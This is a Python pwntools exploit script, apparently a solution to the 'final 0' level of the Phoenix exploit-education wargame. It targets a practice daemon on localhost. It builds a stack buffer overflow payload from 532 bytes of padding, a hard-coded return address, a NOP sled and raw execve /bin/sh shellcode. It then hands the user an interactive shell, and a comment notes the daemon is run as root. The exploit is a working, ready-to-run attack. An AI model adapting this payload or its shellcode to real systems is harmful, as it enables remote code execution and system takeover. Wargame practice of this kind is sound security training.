final 0 phoenix

1. #!/usr/bin/python
2.  
3. from pwn import *
4.  
5. p = remote("localhost", 64013)
6.  
7. def main():
8.     '''
9.     /etc/systemd/system
10.     Run daemon as root:
11.    
12.     [Service]
13.     Type=simple
14.     Restart=always
15.     #User=phoenix-i386-final-zero
16.     #User=phoenix-i386-final-zero
17.     User=root
18.     User=root
19.     '''
20.  
21.     # Skips prompt
22.     p.recvrepeat(0.2)
23.  
24.     # From GDB:
25.     #
26.     # Stopped reason: SIGSEGV
27.     # 0x41507341 in ?? ()
28.     #
29.     # gdb-peda$ pattern_offset 0x41507341
30.     # 1095791425 found at offset: 532
31.  
32.     log.info("Crafting payload")
33.     buf = "A" * 532
34.  
35.     # dmesg | tail -n 5
36.     # traps: final-zero[4587] general protection ip:ffffd844 sp:ffffdd80 error:0
37.     #
38.     # ret_addr = esp + 50
39.  
40.     ret_addr = 0xFFFFDDD4 # 0xffffdd80 + 50
41.     nop_sled = '\x90' * 100
42.  
43.     #----------------#
44.     # 532 A(Junk)    #
45.     #----------------#
46.     # To mid nopsled #
47.     #----------------#
48.     # \x90 *100      #
49.     #----------------#
50.     # shellcode      #
51.     #----------------#
52.  
53.     # http://shell-storm.org/shellcode/files/shellcode-841.php
54.     # Tiny execve sh shellcode 
55.  
56.     sh_code =  "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
57.     sh_code += "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
58.     sh_code += "\x80"
59.  
60.     buf += p32(ret_addr)
61.     buf += nop_sled
62.     buf += sh_code
63.  
64.     p.sendline(buf) # Sends payload
65.  
66.     log.warn("Payload sent!")
67.  
68.     p.interactive() # Pass interaction back to user
69.  
70. if __name__ == "__main__":
71. main()